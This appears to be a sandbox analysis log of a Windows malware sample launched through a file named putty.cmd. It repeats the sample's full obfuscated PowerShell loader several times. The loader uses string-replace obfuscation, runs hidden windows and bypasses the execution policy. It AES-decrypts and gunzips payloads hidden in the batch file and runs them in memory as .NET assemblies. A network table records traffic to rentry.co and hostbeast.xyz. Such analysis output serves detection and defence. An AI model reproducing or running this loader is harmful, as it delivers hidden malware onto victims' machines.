HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 188.114.97.2:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hostbeast.xyz | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 202.110.86.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.22.78.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
